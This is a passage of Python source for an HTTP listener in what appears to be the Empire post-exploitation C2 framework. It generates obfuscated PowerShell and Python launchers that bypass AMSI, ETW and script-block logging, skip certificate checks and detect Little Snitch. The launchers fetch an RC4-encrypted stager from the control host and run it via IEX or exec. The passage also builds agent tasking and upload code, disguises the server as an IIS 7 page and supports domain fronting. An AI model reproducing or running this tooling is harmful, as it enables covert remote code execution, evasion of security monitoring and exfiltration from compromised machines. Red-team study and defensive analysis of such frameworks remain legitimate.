' <div class="content-container"><fieldset>',
' <h2>405 - HTTP verb used to access this page is not allowed.</h2>',
' <h3>The page you are looking for cannot be displayed because an invalid method (HTTP verb) was used to attempt access.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>\r\n'
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\r\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print(helpers.color("[!] Option \"%s\" is required." % (key)))
return False
# If we've selected an HTTPS listener without specifying CertPath, let us know.
if self.options['Host']['Value'].startswith('https') and self.options['CertPath']['Value'] == '':
print(helpers.color("[!] HTTPS selected but no CertPath specified."))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default',
proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='',
listenerName=None, scriptLogBypass=True, AMSIBypass=True, AMSIBypass2=False, ETWBypass=False):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_launcher(): no language specified!'))
if listenerName and (listenerName in self.threads) and (
listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
cookie = listenerOptions['Cookie']['Value']
# generate new cookie if the current session cookie is empty to avoid empty cookie if create multiple listeners
if cookie == '':
generate = self.generate_cookie()
listenerOptions['Cookie']['Value'] = generate
cookie = generate
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
if scriptLogBypass:
stager += bypasses.scriptBlockLogBypass()
if ETWBypass:
stager += bypasses.ETWBypass()
# @mattifestation's AMSI bypass
if AMSIBypass:
stager += bypasses.AMSIBypass()
# rastamouse AMSI bypass
if AMSIBypass2:
stager += bypasses.AMSIBypass2()
if safeChecks.lower() == 'true':
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + "=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='" + userAgent + "';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
stager += "$ser=" + helpers.obfuscate_call_home_address(host) + ";$t='" + stage0 + "';"
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + '.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
if proxy.lower() == 'default':
stager += helpers.randomize_capitalization("$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy=[System.Net.WebRequest]::DefaultWebProxy;")
else:
# TODO: implement form for other proxy
stager += helpers.randomize_capitalization("$proxy=New-Object Net.WebProxy('")
stager += proxy.lower()
stager += helpers.randomize_capitalization("');")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Proxy = $proxy;")
if proxyCreds.lower() != 'none':
if proxyCreds.lower() == "default":
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;")
else:
# TODO: implement form for other proxy credentials
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
if len(username.split('\\')) > 1:
usr = username.split('\\')[1]
domain = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "','" + domain + "');"
else:
usr = username.split('\\')[0]
stager += "$netcred = New-Object System.Net.NetworkCredential('" + usr + "','" + password + "');"
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name(
"wc") + ".Proxy.Credentials = $netcred;")
# save the proxy settings to use during the entire staging process and the agent
stager += "$Script:Proxy = $" + helpers.generate_random_script_var_name("wc") + ".Proxy;"
# TODO: reimplement stager retries?
# check if we're using IPv6
listenerOptions = copy.deepcopy(listenerOptions)
bindIP = listenerOptions['BindIP']['Value']
port = listenerOptions['Port']['Value']
if ':' in bindIP:
if "http" in host:
if "https" in host:
host = 'https://' + '[' + str(bindIP) + ']' + ":" + str(port)
else:
host = 'http://' + '[' + str(bindIP) + ']' + ":" + str(port)
# code to turn the key string into a byte array
stager += helpers.randomize_capitalization("$K=[System.Text.Encoding]::ASCII.GetBytes(")
stager += "'%s');" % (stagingKey)
# this is the minimized RC4 stager code from rc4.ps1
stager += helpers.randomize_capitalization('$R={$D,$K=$Args;$S=0..255;0..255|%{$J=($J+$S[$_]+$K[$_%$K.Count])%256;$S[$_],$S[$J]=$S[$J],$S[$_]};$D|%{$I=($I+1)%256;$H=($H+$S[$I])%256;$S[$I],$S[$H]=$S[$H],$S[$I];$_-bxor$S[($S[$I]+$S[$H])%256]}};')
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='POWERSHELL',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket)
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# If host header defined, assume domain fronting is in use and add a call to the base URL first
# this is a trick to keep the true host name from showing in the TLS SNI portion of the client hello
if headerKey.lower() == "host":
stager += helpers.randomize_capitalization(
"try{$ig=$" + helpers.generate_random_script_var_name(
"wc") + ".DownloadData($ser)}catch{};")
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"%s\",\"%s\");" % (headerKey, headerValue)
# add the RC4 packet to a cookie
stager += helpers.randomize_capitalization(
"$" + helpers.generate_random_script_var_name("wc") + ".Headers.Add(")
stager += "\"Cookie\",\"%s=%s\");" % (cookie, b64RoutingPacket.decode('UTF-8'))
stager += helpers.randomize_capitalization(
"$data=$" + helpers.generate_random_script_var_name("wc") + ".DownloadData($ser+$t);")
stager += helpers.randomize_capitalization("$iv=$data[0..3];$data=$data[4..$data.length];")
# decode everything and kick it over to IEX to kick off execution
stager += helpers.randomize_capitalization("-join[Char[]](& $R $data ($IV+$K))|IEX")
if obfuscate:
stager = helpers.obfuscate(self.mainMenu.installPath, stager, obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
if encode and ((not obfuscate) or ("launcher" not in obfuscationCommand.lower())):
return helpers.powershell_launcher(stager, launcher)
else:
# otherwise return the case-randomized stager
return stager
if language.startswith('py'):
# Python
launcherBase = 'import sys;'
if "https" in host:
# monkey patch ssl woohooo
launcherBase += "import ssl;\nif hasattr(ssl, '_create_unverified_context'):ssl._create_default_https_context = ssl._create_unverified_context;\n"
try:
if safeChecks.lower() == 'true':
launcherBase += "import re, subprocess;"
launcherBase += "cmd = \"ps -ef | grep Little\ Snitch | grep -v grep\"\n"
launcherBase += "ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n"
launcherBase += "out, err = ps.communicate()\n"
launcherBase += "if re.search(\"Little Snitch\", out.decode('UTF-8')):\n"
launcherBase += " sys.exit()\n"
except Exception as e:
p = "[!] Error setting LittleSnitch in stager: " + str(e)
print(helpers.color(p, color='red'))
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
launcherBase += "import urllib.request;\n"
launcherBase += "UA='%s';" % (userAgent)
launcherBase += "server='%s';t='%s';" % (host, stage0)
# prebuild the request routing packet for the launcher
routingPacket = packets.build_routing_packet(stagingKey, sessionID='00000000', language='PYTHON',
meta='STAGE0', additional='None', encData='')
b64RoutingPacket = base64.b64encode(routingPacket).decode('UTF-8')
launcherBase += "req=urllib.request.Request(server+t);\n"
# Add custom headers if any
if customHeaders != []:
for header in customHeaders:
headerKey = header.split(':')[0]
headerValue = header.split(':')[1]
# launcherBase += ",\"%s\":\"%s\"" % (headerKey, headerValue)
launcherBase += "req.add_header(\"%s\",\"%s\");\n" % (headerKey, headerValue)
if proxy.lower() != "none":
if proxy.lower() == "default":
launcherBase += "proxy = urllib.request.ProxyHandler();\n"
else:
proto = proxy.split(':')[0]
launcherBase += "proxy = urllib.request.ProxyHandler({'" + proto + "':'" + proxy + "'});\n"
if proxyCreds != "none":
if proxyCreds == "default":
launcherBase += "o = urllib.request.build_opener(proxy);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
b64RoutingPacket)
else:
launcherBase += "proxy_auth_handler = urllib.request.ProxyBasicAuthHandler();\n"
username = proxyCreds.split(':')[0]
password = proxyCreds.split(':')[1]
launcherBase += "proxy_auth_handler.add_password(None,'" + proxy + "','" + username + "','" + password + "');\n"
launcherBase += "o = urllib.request.build_opener(proxy, proxy_auth_handler);\n"
# add the RC4 packet to a cookie
launcherBase += "o.addheaders=[('User-Agent',UA), (\"Cookie\", \"session=%s\")];\n" % (
b64RoutingPacket)
else:
launcherBase += "o = urllib.request.build_opener(proxy);\n"
else:
launcherBase += "o = urllib.request.build_opener();\n"
# install proxy and creds globally, so they can be used with urlopen.
launcherBase += "urllib.request.install_opener(o);\n"
# download the stager and extract the IV
launcherBase += "a=urllib.request.urlopen(req).read();\n"
launcherBase += "IV=a[0:4];"
launcherBase += "data=a[4:];"
launcherBase += "key=IV+'%s'.encode('UTF-8');" % (stagingKey)
# RC4 decryption
launcherBase += "S,j,out=list(range(256)),0,[]\n"
launcherBase += "for i in list(range(256)):\n"
launcherBase += " j=(j+S[i]+key[i%len(key)])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += "i=j=0\n"
launcherBase += "for char in data:\n"
launcherBase += " i=(i+1)%256\n"
launcherBase += " j=(j+S[i])%256\n"
launcherBase += " S[i],S[j]=S[j],S[i]\n"
launcherBase += " out.append(chr(char^S[(S[i]+S[j])%256]))\n"
launcherBase += "exec(''.join(out))"
if encode:
launchEncoded = base64.b64encode(launcherBase.encode('UTF-8')).decode('UTF-8')
if isinstance(launchEncoded, bytes):
launchEncoded = launchEncoded.decode('UTF-8')
launcher = "echo \"import sys,base64,warnings;warnings.filterwarnings(\'ignore\');exec(base64.b64decode('%s'));\" | python3 &" % (
launchEncoded)
return launcher
else:
return launcherBase
else:
print(helpers.color(
"[!] listeners/http generate_launcher(): invalid language specification: only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color("[!] listeners/http generate_launcher(): invalid listener name specification!"))
def generate_stager(self, listenerOptions, encode=False, encrypt=True, obfuscate=False, obfuscationCommand="",
language=None):
"""
Generate the stager code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_stager(): no language specified!'))
return None
profile = listenerOptions['DefaultProfile']['Value']
uris = [a.strip('/') for a in profile.split('|')[0].split(',')]
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
killDate = listenerOptions['KillDate']['Value']
host = listenerOptions['Host']['Value']
customHeaders = profile.split('|')[2:]
# select some random URIs for staging from the main profile
stage1 = random.choice(uris)
stage2 = random.choice(uris)
if language.lower() == 'powershell':
# read in the stager base
f = open("%s/data/agent/stagers/http.ps1" % (self.mainMenu.installPath))
stager = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
stager = helpers.keyword_obfuscation(stager)
# make sure the server ends with "/"
if not host.endswith("/"):
host += "/"
# Patch in custom Headers
remove = []
if customHeaders != []:
for key in customHeaders:
value = key.split(":")
if 'cookie' in value[0].lower() and value[1]:
continue
remove += value
headers = ','.join(remove)
# headers = ','.join(customHeaders)
stager = stager.replace("$customHeaders = \"\";", "$customHeaders = \"" + headers + "\";")
# patch in working hours, if any
if workingHours != "":
stager = stager.replace('WORKING_HOURS_REPLACE', workingHours)
# Patch in the killdate, if any
if killDate != "":
stager = stager.replace('REPLACE_KILLDATE', killDate)
# patch the server and key information
stager = stager.replace('REPLACE_SERVER', host)
stager = stager.replace('REPLACE_STAGING_KEY', stagingKey)
stager = stager.replace('index.jsp', stage1)
stager = stager.replace('index.php', stage2)
randomizedStager = ''
# forces inputs into a bytestring to ensure 2/3 compatibility
stagingKey = stagingKey.encode('UTF-8')
#stager = stager.encode('UTF-8')
#randomizedStager = randomizedStager.encode('UTF-8')
for line in stager.split("\n"):
line = line.strip()
# skip commented line
if not line.startswith("#"):
# randomize capitalization of lines without quoted strings
if "\"" not in line:
randomizedStager += helpers.randomize_capitalization(line)
else:
randomizedStager += line
if obfuscate:
randomizedStager = helpers.obfuscate(self.mainMenu.installPath, randomizedStager,
obfuscationCommand=obfuscationCommand)
# base64 encode the stager and return it
# There doesn't seem to be any conditions in which the encrypt flag isn't set so the other
# if/else statements are irrelevant
if encode:
return helpers.enc_powershell(randomizedStager)
elif encrypt:
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey, randomizedStager.encode('UTF-8'))
else:
# otherwise just return the case-randomized stager
return randomizedStager
elif language.lower() == 'python':
template_path = [
os.path.join(self.mainMenu.installPath, '/data/agent/stagers'),
os.path.join(self.mainMenu.installPath, './data/agent/stagers')]
eng = templating.TemplateEngine(template_path)
template = eng.get_template('http.py')
template_options = {
'working_hours': workingHours,
'kill_date': killDate,
'staging_key': stagingKey,
'profile': profile,
'stage_1': stage1,
'stage_2': stage2
}
stager = template.render(template_options)
stager = obfuscation.py_minify(stager)
# base64 encode the stager and return it
if encode:
return base64.b64encode(stager)
if encrypt:
# return an encrypted version of the stager ("normal" staging)
RC4IV = os.urandom(4)
return RC4IV + encryption.rc4(RC4IV + stagingKey.encode('UTF-8'), stager.encode('UTF-8'))
else:
# otherwise return the standard stager
return stager
else:
print(helpers.color(
"[!] listeners/http generate_stager(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_agent(self, listenerOptions, language=None, obfuscate=False, obfuscationCommand=""):
"""
Generate the full agent code needed for communications with this listener.
"""
if not language:
print(helpers.color('[!] listeners/http generate_agent(): no language specified!'))
return None
language = language.lower()
delay = listenerOptions['DefaultDelay']['Value']
jitter = listenerOptions['DefaultJitter']['Value']
profile = listenerOptions['DefaultProfile']['Value']
lostLimit = listenerOptions['DefaultLostLimit']['Value']
killDate = listenerOptions['KillDate']['Value']
workingHours = listenerOptions['WorkingHours']['Value']
b64DefaultResponse = base64.b64encode(self.default_response().encode('UTF-8'))
if language == 'powershell':
f = open(self.mainMenu.installPath + "/data/agent/agent.ps1")
code = f.read()
f.close()
# Get the random function name generated at install and patch the stager with the proper function name
code = helpers.keyword_obfuscation(code)
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_powershell_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('$AgentDelay = 60', "$AgentDelay = " + str(delay))
code = code.replace('$AgentJitter = 0', "$AgentJitter = " + str(jitter))
code = code.replace(
'$Profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
"$Profile = \"" + str(profile) + "\"")
code = code.replace('$LostLimit = 60', "$LostLimit = " + str(lostLimit))
code = code.replace('$DefaultResponse = ""', '$DefaultResponse = "' + b64DefaultResponse.decode('UTF-8') + '"')
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('$KillDate,', "$KillDate = '" + str(killDate) + "',")
if obfuscate:
code = helpers.obfuscate(self.mainMenu.installPath, code, obfuscationCommand=obfuscationCommand)
return code
elif language == 'python':
f = open(self.mainMenu.installPath + "/data/agent/agent.py")
code = f.read()
f.close()
# patch in the comms methods
commsCode = self.generate_comms(listenerOptions=listenerOptions, language=language)
code = code.replace('REPLACE_COMMS', commsCode)
# strip out comments and blank lines
code = helpers.strip_python_comments(code)
# patch in the delay, jitter, lost limit, and comms profile
code = code.replace('delay = 60', 'delay = %s' % (delay))
code = code.replace('jitter = 0.0', 'jitter = %s' % (jitter))
code = code.replace(
'profile = "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"',
'profile = "%s"' % (profile))
code = code.replace('lostLimit = 60', 'lostLimit = %s' % (lostLimit))
code = code.replace('defaultResponse = base64.b64decode("")',
'defaultResponse = base64.b64decode("%s")' % (b64DefaultResponse.decode("UTF-8")))
# patch in the killDate and workingHours if they're specified
if killDate != "":
code = code.replace('killDate = ""', 'killDate = "%s"' % (killDate))
if workingHours != "":
code = code.replace('workingHours = ""', 'workingHours = "%s"' % (killDate))
return code
else:
print(helpers.color(
"[!] listeners/http generate_agent(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
def generate_comms(self, listenerOptions, language=None):
"""
Generate just the agent communication code block needed for communications with this listener.
This is so agents can easily be dynamically updated for the new listener.
"""
if language:
if language.lower() == 'powershell':
updateServers = """
$Script:ControlServers = @("%s");
$Script:ServerIndex = 0;
""" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "\n[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
getTask = """
$script:GetTask = {
try {
if ($Script:ControlServers[$Script:ServerIndex].StartsWith("http")) {
# meta 'TASKING_REQUEST' : 4
$RoutingPacket = New-RoutingPacket -EncData $Null -Meta 4
$RoutingCookie = [Convert]::ToBase64String($RoutingPacket)
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add("User-Agent",$script:UserAgent)
$script:Headers.GetEnumerator() | % {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add("Cookie",\"""" + self.session_cookie + """session=$RoutingCookie")
# choose a random valid URI for checkin
$taskURI = $script:TaskURIs | Get-Random
$result = $""" + helpers.generate_random_script_var_name("wc") + """.DownloadData($Script:ControlServers[$Script:ServerIndex] + $taskURI)
$result
}
}
catch [Net.WebException] {
$script:MissedCheckins += 1
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
"""
sendMessage = """
$script:SendMessage = {
param($Packets)
if($Packets) {
# build and encrypt the response packet
$EncBytes = Encrypt-Bytes $Packets
# build the top level RC4 "routing packet"
# meta 'RESULT_POST' : 5
$RoutingPacket = New-RoutingPacket -EncData $EncBytes -Meta 5
if($Script:ControlServers[$Script:ServerIndex].StartsWith('http')) {
# build the web request object
$""" + helpers.generate_random_script_var_name("wc") + """ = New-Object System.Net.WebClient
# set the proxy settings for the WC to be the default system settings
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = [System.Net.WebRequest]::GetSystemWebProxy();
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy.Credentials = [System.Net.CredentialCache]::DefaultCredentials;
if($Script:Proxy) {
$""" + helpers.generate_random_script_var_name("wc") + """.Proxy = $Script:Proxy;
}
$""" + helpers.generate_random_script_var_name("wc") + """.Headers.Add('User-Agent', $Script:UserAgent)
$Script:Headers.GetEnumerator() | ForEach-Object {$""" + helpers.generate_random_script_var_name(
"wc") + """.Headers.Add($_.Name, $_.Value)}
try {
# get a random posting URI
$taskURI = $Script:TaskURIs | Get-Random
$response = $""" + helpers.generate_random_script_var_name("wc") + """.UploadData($Script:ControlServers[$Script:ServerIndex]+$taskURI, 'POST', $RoutingPacket);
}
catch [System.Net.WebException]{
# exception posting data...
if ($_.Exception.GetBaseException().Response.statuscode -eq 401) {
# restart key negotiation
Start-Negotiate -S "$ser" -SK $SK -UA $ua
}
}
}
}
}
"""
return updateServers + getTask + sendMessage
elif language.lower() == 'python':
updateServers = "server = '%s'\n" % (listenerOptions['Host']['Value'])
if listenerOptions['Host']['Value'].startswith('https'):
updateServers += "hasattr(ssl, '_create_unverified_context') and ssl._create_unverified_context() or None"
sendMessage = """
def send_message(packets=None):
# Requests a tasking or posts data to a randomized tasking URI.
# If packets == None, the agent GETs a tasking from the control server.
# If packets != None, the agent encrypts the passed packets and
# POSTs the data to the control server.
global missedCheckins
global server
global headers
global taskURIs
data = None
if packets:
data = ''.join(packets.decode('latin-1'))
# aes_encrypt_then_hmac is in stager.py
encData = aes_encrypt_then_hmac(key, data)
data = build_routing_packet(stagingKey, sessionID, meta=5, encData=encData)
else:
# if we're GETing taskings, then build the routing packet to stuff info a cookie first.
# meta TASKING_REQUEST = 4
routingPacket = build_routing_packet(stagingKey, sessionID, meta=4)
b64routingPacket = base64.b64encode(routingPacket).decode('UTF-8')
headers['Cookie'] = \"""" + self.session_cookie + """session=%s" % (b64routingPacket)
taskURI = random.sample(taskURIs, 1)[0]
requestUri = server + taskURI
try:
data = (urllib.request.urlopen(urllib.request.Request(requestUri, data, headers))).read()
return ('200', data)
except urllib.request.HTTPError as HTTPError:
# if the server is reached, but returns an error (like 404)
missedCheckins = missedCheckins + 1
#if signaled for restaging, exit.
if HTTPError.code == 401:
sys.exit(0)
return (HTTPError.code, '')
except urllib.request.URLError as URLerror:
# if the server cannot be reached
missedCheckins = missedCheckins + 1
return (URLerror.reason, '')
return ('', '')
"""
return updateServers + sendMessage
else:
print(helpers.color(
"[!] listeners/http generate_comms(): invalid language specification, only 'powershell' and 'python' are currently supported for this module."))
else:
print(helpers.color('[!] listeners/http generate_comms(): no language specified!'))
def start_server(self, listenerOptions):
"""
Threaded function that actually starts up the Flask server.
"""
# make a copy of the currently set listener options for later stager/agent generation
listenerOptions = copy.deepcopy(listenerOptions)
# suppress the normal Flask output
log = logging.getLogger('werkzeug')
log.setLevel(logging.ERROR)
bindIP = listenerOptions['BindIP']['Value']
host = listenerOptions['Host']['Value']
port = listenerOptions['Port']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
stagerURI = listenerOptions['StagerURI']['Value']
userAgent = self.options['UserAgent']['Value']
listenerName = self.options['Name']['Value']
proxy = self.options['Proxy']['Value']
proxyCreds = self.options['ProxyCreds']['Value']
app = Flask(__name__)
self.app = app
# Set HTTP/1.1 as in IIS 7.5 instead of /1.0
WSGIRequestHandler.protocol_version = "HTTP/1.1"
@app.route('/download/<stager>')
def send_stager(stager):
if 'po' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='powershell', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
elif 'py' in stager:
launcher = self.mainMenu.stagers.generate_launcher(listenerName, language='python', encode=False,
userAgent=userAgent, proxy=proxy,
proxyCreds=proxyCreds)
return launcher
else:
return make_response(self.default_response(), 404)
@app.before_request
def check_ip():
"""
Before every request, check if the IP address is allowed.
"""
if not self.mainMenu.agents.is_ip_allowed(request.remote_addr):
listenerName = self.options['Name']['Value']
message = "[!] {} on the blacklist/not on the whitelist requested resource".format(request.remote_addr)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.after_request
def change_header(response):
"Modify the headers response server."
headers = listenerOptions['Headers']['Value']
for key in headers.split("|"):
value = key.split(":")
response.headers[value[0]] = value[1]
return response
@app.after_request
def add_proxy_headers(response):
"Add HTTP headers to avoid proxy caching."
response.headers['Cache-Control'] = "no-cache, no-store, must-revalidate"
response.headers['Pragma'] = "no-cache"
response.headers['Expires'] = "0"
return response
@app.errorhandler(405)
def handle_405(e):
"""
Returns IIS 7.5 405 page for every Flask 405 error.
"""
return make_response(self.method_not_allowed_page(), 405)
@app.route('/')
@app.route('/iisstart.htm')
def serve_index():
"""
Return default server web page if user navigates to index.
"""
static_dir = self.mainMenu.installPath + "data/misc/"
return make_response(self.index_page(), 200)
@app.route('/<path:request_uri>', methods=['GET'])
def handle_get(request_uri):
"""
Handle an agent GET request.
This is used during the first step of the staging process,
and when the agent requests taskings.
"""
if request_uri.lower() == 'welcome.png':
# Serves image loaded by index page.
#
# Thanks to making it case-insensitive it works the same way as in
# an actual IIS server
static_dir = self.mainMenu.installPath + "data/misc/"
return send_from_directory(static_dir, 'welcome.png')
clientIP = request.remote_addr
listenerName = self.options['Name']['Value']
message = "[*] GET request for {}/{} from {}".format(request.host, request_uri, clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
routingPacket = None
cookie = request.headers.get('Cookie')
if cookie and cookie != '':
try:
# see if we can extract the 'routing packet' from the specified cookie location
# NOTE: this can be easily moved to a paramter, another cookie value, etc.
if self.session_cookie in cookie:
listenerName = self.options['Name']['Value']
message = "[*] GET cookie value from {} : {}".format(clientIP, cookie)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
cookieParts = cookie.split(';')
for part in cookieParts:
if part.startswith(self.session_cookie):
base64RoutingPacket = part[part.find('=') + 1:]
# decode the routing packet base64 value in the cookie
routingPacket = base64.b64decode(base64RoutingPacket)
except Exception as e:
routingPacket = None
pass
if routingPacket:
# parse the routing packet and process the results
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, routingPacket, listenerOptions,
clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if results:
if isinstance(results, str):
results = results.encode('UTF-8')
if results == b'STAGE0':
# handle_agent_data() signals that the listener should return the stager.ps1 code
# step 2 of negotiation -> return stager.ps1 (stage 1)
listenerName = self.options['Name']['Value']
message = "\n[*] Sending {} stager (stage 1) to {}".format(language, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
stage = self.generate_stager(language=language, listenerOptions=listenerOptions,
obfuscate=self.mainMenu.obfuscate,
obfuscationCommand=self.mainMenu.obfuscateCommand)
return make_response(stage, 200)
elif results.startswith(b'ERROR:'):
listenerName = self.options['Name']['Value']
message = "[!] Error from agents.handle_agent_data() for {} from {}: {}".format(
request_uri, clientIP, results)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
if b'not in cache' in results:
# signal the client to restage
print(helpers.color("[*] Orphaned agent from %s, signaling restaging" % (clientIP)))
return make_response(self.default_response(), 401)
else:
return make_response(self.default_response(), 200)
else:
# actual taskings
listenerName = self.options['Name']['Value']
message = "[*] Agent from {} retrieved taskings".format(clientIP)
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(results, 200)
else:
# dispatcher.send("[!] Results are None...", sender='listeners/http')
return make_response(self.default_response(), 200)
else:
return make_response(self.default_response(), 200)
else:
listenerName = self.options['Name']['Value']
message = "[!] {} requested by {} with no routing packet.".format(request_uri, clientIP)
signal = json.dumps({
'print': True,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
return make_response(self.default_response(), 404)
@app.route('/<path:request_uri>', methods=['POST'])
def handle_post(request_uri):
"""
Handle an agent POST request.
"""
stagingKey = listenerOptions['StagingKey']['Value']
clientIP = request.remote_addr
requestData = request.get_data()
listenerName = self.options['Name']['Value']
message = "[*] POST request data length from {} : {}".format(clientIP, len(requestData))
signal = json.dumps({
'print': False,
'message': message
})
dispatcher.send(signal, sender="listeners/http/{}".format(listenerName))
# the routing packet should be at the front of the binary request.data
# NOTE: this can also go into a cookie/etc.
dataResults = self.mainMenu.agents.handle_agent_data(stagingKey, requestData, listenerOptions, clientIP)
if dataResults and len(dataResults) > 0:
for (language, results) in dataResults:
if isinstance(results, str):
results = results.encode('UTF-8')
if results:
if results.startswith(b'STAGE2'):
# TODO: document the exact results structure returned
if ':' in clientIP:
clientIP = '[' + str(clientIP) + ']'
sessionID = results.split(b' ')[1].strip().decode('UTF-8')
sessionKey = self.mainMenu.agents.agents[sessionID]['sessionKey']
listenerName = self.options['Name']['Value']
